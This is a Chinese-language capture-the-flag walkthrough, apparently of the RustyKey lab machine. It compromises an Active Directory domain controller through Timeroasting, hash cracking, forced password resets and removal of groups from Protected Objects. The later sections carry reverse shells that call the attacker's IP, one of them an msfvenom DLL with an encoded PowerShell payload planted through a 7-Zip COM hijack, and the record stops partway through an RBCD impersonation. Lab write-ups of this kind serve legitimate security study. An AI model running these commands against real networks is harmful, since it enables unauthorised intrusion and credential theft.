RustyKey
初始账号密码: rr.parker/ 8#t5HE8L!W3A
1. 信息收集
1.1. 端口扫描
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
9389/tcp open adws syn-ack ttl 127
47001/tcp open winrm syn-ack ttl 127
49664/tcp open unknown syn-ack ttl 127
49665/tcp open unknown syn-ack ttl 127
49666/tcp open unknown syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49669/tcp open unknown syn-ack ttl 127
49670/tcp open unknown syn-ack ttl 127
49671/tcp open unknown syn-ack ttl 127
49672/tcp open unknown syn-ack ttl 127
49673/tcp open unknown syn-ack ttl 127
49676/tcp open unknown syn-ack ttl 127
49692/tcp open unknown syn-ack ttl 127
49737/tcp open unknown syn-ack ttl 127
┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# nmap 10.10.11.75 -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49669,49670,49671,49672,49673,49676,49692,49737 -sCV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-29 01:32 EDT
Nmap scan report for 10.10.11.75
Host is up (0.088s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-29 10:11:06Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49692/tcp open msrpc Microsoft Windows RPC
49737/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# cat ports |grep '/tcp' |awk '{print $1}'|cut -d '/' -f1|tr '\n' ','|sed 's/,$//'
53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49669,49670,49671,49672,49673,49676,49692,49737
┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# nmap 10.10.11.75 -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49669,49670,49671,49672,49673,49676,49692,49737 -sCV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-29 01:32 EDT
Nmap scan report for 10.10.11.75
Host is up (0.088s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-29 10:11:06Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49692/tcp open msrpc Microsoft Windows RPC
49737/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-06-29T10:12:11
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 4h39m04s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.42 seconds
1.2. bloodhound
先校验一下题目给出的凭证
┌──(root㉿kali)-[~]
└─# nxc ldap 10.10.11.75 -u 'rr.parker' -p '8#t5HE8L!W3A'
LDAP 10.10.11.75 389 DC [*] None (name:DC) (domain:rustykey.htb)
LDAP 10.10.11.75 389 DC [-] rustykey.htb\rr.parker:8#t5HE8L!W3A STATUS_NOT_SUPPORTED
┌──(root㉿kali)-[~]
└─# nxc smb 10.10.11.75 -u 'rr.parker' -p '8#t5HE8L!W3A'
SMB 10.10.11.75 445 10.10.11.75 [*] x64 (name:10.10.11.75) (domain:10.10.11.75) (signing:True) (SMBv1:False) (NTLM:False)
SMB 10.10.11.75 445 10.10.11.75 [-] 10.10.11.75\rr.parker:8#t5HE8L!W3A STATUS_NOT_SUPPORTED
发现登录失败了,提示 NTLM:False,说明目标机器禁用了NTLM 认证
使用kerberos认证测试成功
┌──(root㉿kali)-[~]
└─# nxc smb 10.10.11.75 -u 'rr.parker' -p '8#t5HE8L!W3A' -k
SMB 10.10.11.75 445 10.10.11.75 [*] x64 (name:10.10.11.75) (domain:10.10.11.75) (signing:True) (SMBv1:False) (NTLM:False)
SMB 10.10.11.75 445 10.10.11.75 [-] 10.10.11.75\rr.parker:8#t5HE8L!W3A KDC_ERR_WRONG_REALM
┌──(root㉿kali)-[~]
└─# nxc ldap 10.10.11.75 -u 'rr.parker' -p '8#t5HE8L!W3A' -k
LDAP 10.10.11.75 389 DC [*] None (name:DC) (domain:rustykey.htb)
LDAP 10.10.11.75 389 DC [+] rustykey.htb\rr.parker:8#t5HE8L!W3A
也可以导入
配置一下hosts
10.10.11.75 rustykey.htb dc.rustykey.htb
bloodhound 收集
┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# nxc ldap 10.10.11.75 -u 'rr.parker' -p '8#t5HE8L!W3A' -k --bloodhound -c all -d rustykey.htb --dns-server 10.10.11.75
LDAP 10.10.11.75 389 DC [*] None (name:DC) (domain:rustykey.htb)
LDAP 10.10.11.75 389 DC [+] rustykey.htb\rr.parker:8#t5HE8L!W3A
LDAP 10.10.11.75 389 DC Resolved collection methods: objectprops, dcom, localadmin, container, group, session, acl, psremote, trusts, rdp
LDAP 10.10.11.75 389 DC Using kerberos auth without ccache, getting TGT
LDAP 10.10.11.75 389 DC Done in 00M 13S
LDAP 10.10.11.75 389 DC Compressing output into /root/.nxc/logs/DC_10.10.11.75_2025-06-29_073914_bloodhound.zip
没有找到任何直接的攻击链
但是通过分析,可以筛选出可能是下一步目标的对象
发现域内存在大量的机器用户
而且其中有一个机器用户 IT-COMPUTER3 很可疑,因为其他机器的出站访问控制都是0.而他却有6项
IT-COMPUTER3用户可以把自己添加到用户组HELPDESK中,HELPDESK组的成员可以对好几个用户进行ForceChangePassword操作
并且,其中三个用户还是 REMOTE MANAGEMENT USERS 组成员,可以进行远程登录
此外,还发现了一些有价值的用户,如 MM.TURNER,他可以在 DC.RUSTYKEY.HTB 进行RBCD
但这肯定不是我们当前的目标,应该是最后获取root的路径之一
还有一个高价值用户 backupadmin,他是属于管理员组的成员
2. 横向移动
结合上面的分析,那我们下一步很可能是获取 IT-COMPUTER3$ 用户的权限。
我知道有一种枚举手段很适合当前的情况,
为什么会想到timeroast
- 靶机名称叫做 Rustykey 意思是生锈的钥匙, 可能是过时的密码什么的,timeroat利用要求之一就是计算机账号使用了非标准或旧式默认密码
- timeroat只能获取到机器账号的hash,很适合当前环境下进行尝试
IPPSEC 向我展示了一种更合理的方式(通过上次更改计算机密码的时间与计算机创建时间是否一致来判断)
通常计算机会在创建时默认创建一个十分复杂的密码,从出题者的角度来说,设置一个timeroast的考点必然需要修改计算机的密码为一个可以被爆破出来的密码。否则是毫无意义的
ippsec通过发现创建密码的时间与修改密码时间不一致,判断出这里很可能是timeroat
https://youtu.be/vkbIVr4_ZdE?t=808
2.1. timeroast
┌──(root㉿kali)-[~/…/htb/season8/RustyKey/Timeroast]
└─# python3 timeroast.py 10.10.11.75
1000:$sntp-ms$3cee29dfbcdc366c5c9d0cd27e953e12$1c0111e900000000000a036e4c4f434cec0bd5e51e897488e1b8428bffbfcd0aec0bda6ab699c106ec0bda6ab699e294
1103:$sntp-ms$d9d46c25fc6f896b8868287fa1b866e4$1c0111e900000000000a036e4c4f434cec0bd5e51f575628e1b8428bffbfcd0aec0bda6b6746daafec0bda6b6746fc3d
1104:$sntp-ms$e94f96f97068c1fba1d188aca95fd420$1c0111e900000000000a036e4c4f434cec0bd5e52152aef9e1b8428bffbfcd0aec0bda6b69422e78ec0bda6b69425bc5
1105:$sntp-ms$af79629b8248f5b053f4ff91fc780907$1c0111e900000000000a036e4c4f434cec0bd5e51ebc81fbe1b8428bffbfcd0aec0bda6b6ac499f8ec0bda6b6ac4c08e
1106:$sntp-ms$6dd9da8e7129fbb4af960b5aacf9e81d$1c0111e900000000000a036e4c4f434cec0bd5e5206fb81ee1b8428bffbfcd0aec0bda6b6c77cb12ec0bda6b6c77fbba
1107:$sntp-ms$9ed2b56dd597b5d88decfce3d4c396bd$1c0111e900000000000a036e4c4f434cec0bd5e51de09353e1b8428bffbfcd0aec0bda6b6e013ec4ec0bda6b6e0163ad
1118:$sntp-ms$1cbe7e20162f678abc9fa0c970961089$1c0111e900000000000a036e4c4f434cec0bd5e51fa0b5ede1b8428bffbfcd0aec0bda6b7fa09b15ec0bda6b7fa0c359
1119:$sntp-ms$9d0f1ba81ec3fc23056390a536641264$1c0111e900000000000a036e4c4f434cec0bd5e51fba6846e1b8428bffbfcd0aec0bda6b7fba50c9ec0bda6b7fba75b2
1120:$sntp-ms$9cb4eba806956209232b5bdd261316fe$1c0111e900000000000a036e4c4f434cec0bd5e52118d914e1b8428bffbfcd0aec0bda6b8118b27eec0bda6b8118e9db
1121:$sntp-ms$a45b70e3c9f901ce575cb25fea007b8e$1c0111e900000000000a036e4c4f434cec0bd5e51e963dc4e1b8428bffbfcd0aec0bda6b82aeb158ec0bda6b82aee052
1122:$sntp-ms$8ca7da413399cea53f33acc288a5b79d$1c0111e900000000000a036e4c4f434cec0bd5e5207d749fe1b8428bffbfcd0aec0bda6b8495e686ec0bda6b8496172e
1123:$sntp-ms$5d0c2faf37c4da0d342ae2cbef599650$1c0111e900000000000a036e4c4f434cec0bd5e51e37a8e3e1b8428bffbfcd0aec0bda6b86272a10ec0bda6b86275401
1124:$sntp-ms$602715575db5df815ec6866bb1558bba$1c0111e900000000000a036e4c4f434cec0bd5e51faf31b1e1b8428bffbfcd0aec0bda6b879eb130ec0bda6b879ee02a
1125:$sntp-ms$765ac7d7a6727af434a480b77fc7550b$1c0111e900000000000a036e4c4f434cec0bd5e5216cc5fbe1b8428bffbfcd0aec0bda6b895c3d17ec0bda6b895c711a
1126:$sntp-ms$8bbb3166ec5d7555090b3d526a03f03c$1c0 111e900000000000a036e4c4f434cec0bd5e51ef89ab0e1b8428bffbfcd0aec0bda6b8b00af52ec0bda6b8b00daf1
1127:$sntp-ms$7511677fe9fa4fb633889f3138c169d5$1c0111e900000000000a036e4c4f434cec0bd5e520ae8914e1b8428bffbfcd0aec0bda6b8cb698adec0bda6b8cb6c7a7
此次也可以用 NetExec 的 timeroast 模块
┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# nxc smb 10.10.11.75 -M timeroast
SMB 10.10.11.75 445 10.10.11.75 [*] x64 (name:10.10.11.75) (domain:10.10.11.75) (signing:True) (SMBv1:False) (NTLM:False)
TIMEROAST 10.10.11.75 445 10.10.11.75 [*] Starting Timeroasting...
TIMEROAST 10.10.11.75 445 10.10.11.75 1000:$sntp-ms$d38d5c0b5b3455d0bce308b310a09fd3$1c0111e900000000000a032f4c4f434cec0d3d472cd57009e1b8428bffbfcd0aec0d417a0cd55f42ec0d417a0cd57bc7
TIMEROAST 10.10.11.75 445 10.10.11.75 1105:$sntp-ms$2e8c228e051ccc06e034d8f0ad22a0e6$1c0111e900000000000a03304c4f434cec0d3d472ac3aa0ee1b8428bffbfcd0aec0d417b12b33a54ec0d417b12b35024
TIMEROAST 10.10.11.75 445 10.10.11.75 1103:$sntp-ms$aa4178da7beab82273eef5ba458d5bca$1c0111e900000000000a03304c4f434cec0d3d472e8b37d7e1b8428bffbfcd0aec0d417b12a3bc32ec0d417b12a3d8b7
TIMEROAST 10.10.11.75 445 10.10.11.75 1104:$sntp-ms$bbe9a87e1bc935053aa6094bd829462b$1c0111e900000000000a03304c4f434cec0d3d472adfa79ae1b8428bffbfcd0aec0d417b12cf2dd0ec0d417b12cf4f5e
TIMEROAST 10.10.11.75 445 10.10.11.75 1106:$sntp-ms$03469059c942dfefce4105045a93cc6c$1c0111e900000000000a03304c4f434cec0d3d472afbe843e1b8428bffbfcd0aec0d417b12eb53a0ec0d417b12eb91b3
TIMEROAST 10.10.11.75 445 10.10.11.75 1107:$sntp-ms$a70b513c4df8f351bf5e4d1f031e87cf$1c0111e900000000000a03304c4f434cec0d3d472b009e8be1b8428bffbfcd0aec0d417b12f0281bec0d417b12f047fc
TIMEROAST 10.10.11.75 445 10.10.11.75 1119:$sntp-ms$ee08832a709f0716e5587f0ba6f465eb$1c0111e900000000000a03304c4f434cec0d3d472b2beb40e1b8428bffbfcd0aec0d417b131b808fec0d417b131b8fa8
TIMEROAST 10.10.11.75 445 10.10.11.75 1118:$sntp-ms$70ed9cab854cdc13074d3367cc7a69f6$1c0111e900000000000a03304c4f434cec0d3d472b2a751ee1b8428bffbfcd0aec0d417b131a0a6dec0d417b131a17d9
TIMEROAST 10.10.11.75 445 10.10.11.75 1120:$sntp-ms$9ed64142ff41010eed5710987273f208$1c0111e900000000000a03304c4f434cec0d3d472b43eb11e1b8428bffbfcd0aec0d417b1333764fec0d417b133392d4
TIMEROAST 10.10.11.75 445 10.10.11.75 1123:$sntp-ms$2be50e07a42d664b41e1e3ff068ff481$1c0111e900000000000a03304c4f434cec0d3d472abaa07ae1b8428bffbfcd0aec0d417b16c2bf2cec0d417b16c2dd5f
TIMEROAST 10.10.11.75 445 10.10.11.75 1125:$sntp-ms$6bb91a165db888273806c5063e224205$1c0111e900000000000a03304c4f434cec0d3d472ad63b0ae1b8428bffbfcd0aec0d417b16de5d18ec0d417b16de7494
TIMEROAST 10.10.11.75 445 10.10.11.75 1126:$sntp-ms$7c5e98e59be2a5ff9f474647f2854f87$1c0111e900000000000a03304c4f434cec0d3d472ae2c12ae1b8428bffbfcd0aec0d417b16eae338ec0d417b16eafab5
TIMEROAST 10.10.11.75 445 10.10.11.75 1121:$sntp-ms$b5329e265eb25bea74b381a57bd2288d$1c0111e900000000000a03304c4f434cec0d3d472ab83f77e1b8428bffbfcd0aec0d417b16c05c7cec0d417b16c07c5c
TIMEROAST 10.10.11.75 445 10.10.11.75 1122:$sntp-ms$d0cf0d85336f5421bc9e8de7b1eaca18$1c0111e900000000000a03304c4f434cec0d3d472ad1683de1b8428bffbfcd0aec0d417b16d98394ec0d417b16d9a374
TIMEROAST 10.10.11.75 445 10.10.11.75 1124:$sntp-ms$5dfbb42d0e489ba7db211b7f9af3aeea$1c0111e900000000000a03304c4f434cec0d3d472ae54061e1b8428bffbfcd0aec0d417b16ed5f13ec0d417b16ed79eb
TIMEROAST 10.10.11.75 445 10.10.11.75 1127:$sntp-ms$d140860524488306176e6926aa7e2cb9$1c0111e900000000000a03304c4f434cec0d3d472affb04ee1b8428bffbfcd0aec0d417b1707c9f8ec0d417b1707eb86
去掉前面的数字和冒号,放到文件中,利用hashcat可以批量破解(需要 hashcat最新版本)
D:\Downloads\hashcat-6.2.6+1051\hashcat-6.2.6>hashcat hash.txt rockyou.txt --show
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:
31300 | MS SNTP | Network Protocol
NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.
$sntp-ms$765ac7d7a6727af434a480b77fc7550b$1c0111e900000000000a036e4c4f434cec0bd5e5216cc5fbe1b8428bffbfcd0aec0bda6b895c3d17ec0bda6b895c711a:Rusty88!
此hash对应的SID是1125,对应的用户名是 IT-COMPUTER3$
验证一下
┌──(root㉿kali)-[~/…/season8/RustyKey/Timeroast/extra-scripts]
└─# nxc ldap 10.10.11.75 -u 'IT-COMPUTER3' -p 'Rusty88!' -k
LDAP 10.10.11.75 389 DC [*] None (name:DC) (domain:rustykey.htb)
LDAP 10.10.11.75 389 DC [+] rustykey.htb\IT-COMPUTER3:Rusty88!
┌──(root㉿kali)-[~/…/season8/RustyKey/Timeroast/extra-scripts]
└─# nxc smb 10.10.11.75 -u 'IT-COMPUTER3$' -p 'Rusty88!' -k
SMB 10.10.11.75 445 10.10.11.75 [*] x64 (name:10.10.11.75) (domain:10.10.11.75) (signing:True) (SMBv1:False) (NTLM:False)
SMB 10.10.11.75 445 10.10.11.75 [-] 10.10.11.75\IT-COMPUTER3$:Rusty88! KDC_ERR_WRONG_REALM
2.2. AddMember
┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k --dc-ip 10.10.11.75 add groupMember 'HELPDESK' 'IT-COMPUTER3$'
[+] IT-COMPUTER3$ added to HELPDESK
然后 HELPDESK 组用户可以修改很多用户的密码。我们下一步肯定是获取一个可以远程登录的用户,这里发现这三个用户都可以远程登录
但是 GG.ANDERSON 没有启用,所以只能选剩下两个用户进行尝试
这里还发现 IT 与 SUPPORT 组属于 PROTECTED OBJECTS 组,PROTECTED OBJECTS 组又属于 PROTECTED USERS 组
此组的成员会有很多的限制,如Kerberos 票证限制,禁用传统的认证协议(如NTLM认证),无法进行委派,不能进行远程交互等等
但是因为 helpdek 组的成员可以对 PROTECTED OBJECTS 组进行AddMember操作,那也可以进行remove操作
所以我们可以从 PROTECTED OBJECTS 组中remove掉 IT组 与 SUPPORT组,从而规避受保护组的相关限制,如限制远程登录
2.3. BB.MORGAN
下一步我们修改掉 BB.MORGAN 用户的密码,并且将 IT组 从 PROTECTED OBJECTS 组中remove掉,然后再申请 BB.MORGAN 的TGT,进行kerberos认证的登录
先改密码 并脱离受保护组
┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k --dc-ip 10.10.11.75 set password BB.MORGAN Admin123!
[+] Password changed successfully!
┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k remove groupMember 'PROTECTED OBJECTS' 'IT'
[-] IT removed from PROTECTED OBJECTS
然后获取 BB.MORGAN 的TGT,方便进行kerberos认证
┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# impacket-getTGT 'RUSTYKEY.HTB/BB.MORGAN:Admin123!'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in BB.MORGAN.ccache
#导入凭证
export KRB5CCNAME=BB.MORGAN.ccache
这里还要配置 /etc/krb5.conf
vim /etc/krb5.conf
#增加以下内容
[realms]
RUSTYKEY.HTB = {
kdc = dc.rustykey.htb
admin_server = dc.rustykey.htb
}
[domain_realm]
.rustykey.htb = RUSTYKEY.HTB
rustykey.htb = RUSTYKEY.HTB
然后远程登录
┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# evil-winrm -i dc.rustykey.htb -r RUSTYKEY.HTB
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\bb.morgan\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\bb.morgan\desktop> ls
Directory: C:\Users\bb.morgan\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/4/2025 9:15 AM 1976 internal.pdf
-ar--- 6/30/2025 1:38 PM 34 user.txt
用户桌面发现 internal.pdf
直接叫GPT帮我们分析
大致意思就是给 SUPPORT 组的用户归档功能相关的拓展权限,如可以修改相关的注册表等。
下一步我们应该需要获取一下这个 SUPPORT 组的用户 EE.REED,然后利用这个拓展权限干坏事
2.4. RunasCS 上线 EE.REED
利用RunasCS切换到 EE.REED 用户
先利用 HELPDESK 组的用户, 修改 EE.REED 的密码
┌──(root㉿kali)-[~]
└─# bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k --dc-ip 10.10.11.75 set password EE.REED Admin123!
[+] Password changed successfully!
此外还要让 SUPPORT 组脱离 PROTECTED OBJECTS 组
┌──(root㉿kali)-[~/Desktop/BloodHound]
└─# bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k remove groupMember 'PROTECTED OBJECTS' 'SUPPORT'
[-] SUPPORT removed from PROTECTED OBJECTS
使用RunasCS 先测试一下,是否可以使用 ee.reed 用户执行命令
*Evil-WinRM* PS C:\Users\bb.morgan\Documents> .\RunasCS.exe ee.reed Admin123! "cmd /c whoami"
[*] Warning: User profile directory for user ee.reed does not exists. Use --force-profile if you want to force the creation.
[*] Warning: The logon for user 'ee.reed' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
rustykey\ee.reed
然后反弹shell (建议这几步在短时间内连续执行)
#修改密码
┌──(root㉿kali)-[~/Desktop/BloodHound]
└─# bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k --dc-ip 10.10.11.75 set password EE.REED Admin123!
[+] Password changed successfully!
#脱离受保护组
┌──(root㉿kali)-[~/Desktop/BloodHound]
└─# bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k remove groupMember 'PROTECTED OBJECTS' 'SUPPORT'
[-] SUPPORT removed from PROTECTED OBJECTS
#开启监听
┌──(root㉿kali)-[~]
└─# rlwrap nc -lnvp 6666
listening on [any] 6666 ...
#RunasCS反弹shell
*Evil-WinRM* PS C:\windows\Temp> .\RunasCS.exe ee.reed Admin123! powershell.exe -r 10.10.14.46:6666
[*] Warning: User profile directory for user ee.reed does not exists. Use --force-profile if you want to force the creation.
[*] Warning: The logon for user 'ee.reed' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-39ffe$\Default
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 3248 created in background.
然后你就可以获取到 ee.reed 用户的shell
┌──(root㉿kali)-[~]
└─# rlwrap nc -lnvp 6666
listening on [any] 6666 ...
connect to [10.10.14.46] from (UNKNOWN) [10.10.11.75] 63944
Microsoft Windows [Version 10.0.17763.7434]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
rustykey\ee.reed
2.5. COM劫持
COM Hijacking
参考文章
- Event Triggered Execution: Component Object Model Hijacking, Sub-technique T1546.015 - Enterprise | MITRE ATT&CK®
- Persistence – COM Hijacking – Penetration Testing Lab
- Persistence: "the continued or prolonged existence of something": Part 2 - COM Hijacking - MDSec
邮件提到了归档功能,如压缩等功能,我们可以先看下系统有没有安装相关的应用
发现安装了 7zip
*Evil-WinRM* PS C:\Users\bb.morgan\Documents> Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* |
Select-Object DisplayName, DisplayVersion, Publisher, InstallDate |
Where-Object { $_.DisplayName } |
Sort-Object DisplayName
DisplayName DisplayVersion Publisher InstallDate
----------- -------------- --------- -----------
7-Zip 24.09 (x64) 24.09 Igor Pavlov
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 14.36.32532 Microsoft Corporation 20241226
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532 14.36.32532 Microsoft Corporation 20241226
VMware Tools 12.4.5.23787635 VMware, Inc. 20241226
msfvenom -p windows/x64/exec CMD='powershell.exe -nop -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANAA2ACIALAA0ADQANgA2ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==' EXITFUNC=none -f dll > 4466.dll
rlwrap nc -lnvp 4466
$targetCLSID = 'HKLM:\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32'
Set-ItemProperty -Path $targetCLSID -Name '(default)' -Value 'C:\tmp\4466.dll'
┌──(root㉿kali)-[~]
└─# rlwrap nc -lnvp 4466
listening on [any] 4466 ...
connect to [10.10.14.46] from (UNKNOWN) [10.10.11.75] 57297
PS C:\Windows> whoami
rustykey\mm.turner
PS C:\Windows>
2.6. RBCD
Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount IT-COMPUTER3$
┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# impacket-getST -spn 'cifs/DC.rustykey.htb' -impersonate backupadmin -dc-ip 10.10.11.75 -k 'rustykey.htb/IT-COMPUTER3$:Rusty88!'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating backupadmin
[*] Requesting S4U2self
